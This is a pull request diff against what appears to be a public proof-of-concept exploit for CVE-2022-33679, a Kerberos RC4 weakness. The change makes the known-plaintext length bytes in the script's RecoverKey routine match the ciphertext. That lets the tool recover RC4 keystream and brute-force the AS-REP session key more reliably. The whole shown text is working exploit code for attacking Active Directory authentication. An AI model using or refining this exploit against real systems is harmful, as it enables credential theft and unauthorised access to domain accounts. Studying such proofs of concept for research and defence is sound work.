### PR TITLE
Update CVE-2022-33679.py

### DIFF
--- a/CVE-2022-33679.py
+++ b/CVE-2022-33679.py
@@ -130,6 +130,14 @@ class TGTBrute:
 
     def RecoverKey(self, encryptedAsREP):
         AsREPPlain = b'\x00'*24+b'y\x82\x02\x140\x82\x02\x10\xa0\x1b0\x19\xa0\x03\x02\x01\x80\xa1\x12\x04\x10'
+        
+        dec_len = len(encryptedAsREP) - 0x18
+        l1 = dec_len - 4
+        l2 = dec_len - 8
+        AsREPPlain = list(AsREPPlain)
+
+        AsREPPlain[26], AsREPPlain[27] = l1.to_bytes(2, 'big')
+        AsREPPlain[30], AsREPPlain[31] = l2.to_bytes(2, 'big')
 
         RC4Flow = bytes([AsREPPlain[i]^encryptedAsREP[i] for i in range(45)])
         #first byte of the key


### PR DESCRIPTION
the length part of DER encoded AsREPPlain is not a fixed value, should be updated according to the length of cipher text